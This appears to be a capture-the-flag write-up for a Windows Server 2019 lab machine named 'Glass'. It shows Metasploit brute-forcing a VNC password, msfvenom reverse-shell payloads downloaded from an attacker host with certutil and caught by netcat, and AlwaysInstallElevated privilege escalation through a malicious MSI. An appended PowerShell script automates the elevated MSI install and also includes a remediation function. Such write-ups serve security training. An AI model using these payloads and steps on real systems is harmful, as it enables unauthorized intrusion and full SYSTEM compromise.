# Glass

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fb33a9a859c0e7e3c8ce1788f92d74203a7666ae%2Fimage.png?alt=media)

## Nmap

```
sudo nmap 172.31.1.25 -p- -sS -sC

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
| rdp-ntlm-info: 
|   Target_Name: GLASS
|   NetBIOS_Domain_Name: GLASS
|   NetBIOS_Computer_Name: GLASS
|   DNS_Domain_Name: Glass
|   DNS_Computer_Name: Glass
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-21T18:33:17+00:00
| ssl-cert: Subject: commonName=Glass
| Not valid before: 2020-07-22T18:19:53
|_Not valid after:  2021-01-21T18:19:53
|_ssl-date: 2020-12-21T18:33:17+00:00; 0s from scanner time.
5800/tcp  open  vnc-http
|_http-title: TightVNC desktop [glass]
5900/tcp  open  vnc
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VNC Authentication (2)
|     Tight (16)
|   Tight auth subtypes: 
|_    STDV VNCAUTH_ (2)
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
```

## SMB

As is standard, we start with a quick null-session authentication check against SMB. However, the server refuses it and we get no access.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-04c2306803ee82af626eb26abe182ccb73373679%2Fimage.png?alt=media)

## VNC

Ports 5800 and 5900 show TightVNC running (5800 serves the browser-based viewer, 5900 is the RFB service itself). `metasploit` has a login scanner module that we can use to brute-force VNC passwords: `auxiliary/scanner/vnc/vnc_login`

Set RHOSTS (and RPORT, if the service is not on 5900), then run the module with its default settings, which include a short built-in list of common VNC passwords.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-42ba340aa2aabe16ab3fe1d47db56e42911477e8%2Fimage.png?alt=media)

`metasploit` finds a valid login of `<blank>:password`. Classic VNC authentication has no username, only a password (and only its first 8 characters are used), so the blank user is simply how the module reports the result; the password is `password`. Kali comes pre-installed with `vncviewer`, which we can use to log into the remote desktop.

## Initial Foothold

Running `vncviewer` on Kali prompts for the server address and then the password (alternatively, pass the host directly with `vncviewer 172.31.1.25`). After entering these you should be presented with the desktop below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dfd141438b3b2a2ca1b9528845b60580bce5770a%2Fimage.png?alt=media)

I will now create a reverse shell executable, host it with Python's `SimpleHTTPServer`, and download it to the victim machine with `certutil.exe`.

First, on Kali, we create a reverse shell executable with `msfvenom`. This must be the stageless `shell_reverse_tcp` payload: the staged `shell/reverse_tcp` variant only sends a small stager that expects Metasploit's `multi/handler` to deliver the second stage, so it will connect back to a plain `netcat` listener but never produce a shell. The output filename should match the one we request with `certutil.exe` below (`connect.exe`).

```
msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4455 -f exe -o <Destination>
```

We can then move to the directory location of the payload we just created and host a Python HTTP server.

```
sudo python2 -m SimpleHTTPServer 80
```

We can now open a `netcat` listener on our attacking machine specifying the listening port as the one we defined in the `msfvenom` payload.

```
nc -lvp 4455
```

On the victim machine, from the VNC session, we open `cmd.exe` and use `certutil.exe` to download the payload we created; it is written to the current directory as `connect.exe`.

```
cmd.exe /c certutil.exe -f -urlcache -split http://10.10.0.176/connect.exe
```

When the listener is ready, run the downloaded executable.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba1a99c0f6cbf70313bc4babd092e83ba6236449%2Fimage.png?alt=media)

We now get a shell on our attacking machine.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d613c679505d6fcaba51eac4c0f7ca164e5aa23%2Fimage.png?alt=media)

## Privilege Escalation

A quick check of our groups and privileges (`whoami /groups`, `whoami /priv`) shows we belong to no interesting groups and hold no interesting privileges.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4fcd8413a69b94a23b308989d49a979e7331d89c%2Fimage.png?alt=media)

The `systeminfo` command shows we are running on Windows Server 2019.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f360434c06cf78e35604d94cd2069006d4875333%2Fimage.png?alt=media)

We can upload winPEAS.exe to the server (using the same `certutil.exe` technique) to help with the privilege escalation stage of our attack.

winPEAS soon flags AlwaysInstallElevated set to 1, meaning enabled. The check has to pass for both the HKLM and HKCU policy keys for the technique to work; winPEAS reads both.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-124b039103d671ca8f57dc7346f6ab3f5661385c%2Fimage.png?alt=media)

When the `AlwaysInstallElevated` DWORD is 1 under both `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`, Windows Installer runs any `.msi` package a standard user installs with SYSTEM privileges, including the package's custom actions. We can use `msfvenom` to build a reverse shell MSI and install it on the target.

```
msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4466 -f msi -o <Destination>
```

We then start another `netcat` listener on port 4466, download the MSI to the victim with `certutil.exe` as before, and install it with `msiexec` (`msiexec /quiet /qn /i <payload>.msi`).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68c68e0850b5ce423261dd77036684ec9ec126f9%2Fimage.png?alt=media)

Our `netcat` listener then picks up a shell and we confirm we are running as SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-900743d1b72def51de9c273c47cb6c870d0387e1%2Fimage.png?alt=media)
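As an added example (not part of the original writeup), the following PowerShell, run from the low-privileged foothold shell, performs the same AlwaysInstallElevated check winPEAS does, installs the MSI through Windows Installer only if the policy is enabled in both hives, and shows the local remediation a defender would apply. The MSI path `C:\Users\Public\shell.msi` and the listener port 4466 are assumptions for illustration; the remediation function needs administrative rights.

```powershell
# Added example, not from the original writeup. Assumes the msfvenom MSI has already
# been fetched with certutil to C:\Users\Public\shell.msi and a listener waits on port 4466.

$InstallerPolicyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    # Windows Installer only honours the policy when the DWORD is 1 in BOTH hives;
    # a missing key or a 0 in either one means msiexec installs as the current user.
    $enabled = 0
    foreach ($key in $InstallerPolicyKeys) {
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $shown = if ($null -eq $value) { 'not set' } else { $value }
        Write-Host ("{0} -> {1}" -f $key, $shown)
        if ($value -eq 1) { $enabled++ }
    }
    return ($enabled -eq 2)
}

function Invoke-ElevatedMsi {
    param([Parameter(Mandatory)][string]$Path)
    # /i installs the package, /quiet /qn suppress all UI. The custom action inside the
    # msfvenom MSI is executed by the Windows Installer service, so the reverse shell it
    # spawns runs as NT AUTHORITY\SYSTEM regardless of who invoked msiexec.
    $proc = Start-Process -FilePath 'msiexec.exe' -ArgumentList @('/quiet', '/qn', '/i', "`"$Path`"") -PassThru -Wait
    return $proc.ExitCode
}

function Disable-AlwaysInstallElevated {
    # Local remediation (requires administrative rights): set the policy to 0 in both hives.
    foreach ($key in $InstallerPolicyKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

if (Test-AlwaysInstallElevated) {
    $code = Invoke-ElevatedMsi -Path 'C:\Users\Public\shell.msi'
    # The install itself is expected to fail (a non-zero code such as 1603 is normal) after
    # the payload has already fired; check the netcat listener rather than the exit code.
    Write-Host "msiexec exited with $code; check the listener on port 4466"
} else {
    Write-Host 'AlwaysInstallElevated is not enabled in both hives; this vector does not apply.'
}
```

`Test-AlwaysInstallElevated` is the same pair of registry reads winPEAS performs and is worth running before bothering with the MSI, because the policy is often found enabled in only one hive, in which case `msiexec` silently installs the package as the current user and no SYSTEM shell comes back. The real fix is the Group Policy setting behind these keys ("Always install with elevated privileges" under both Computer Configuration and User Configuration); `Disable-AlwaysInstallElevated` only mirrors that locally and a user could re-enable the HKCU half on their own.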
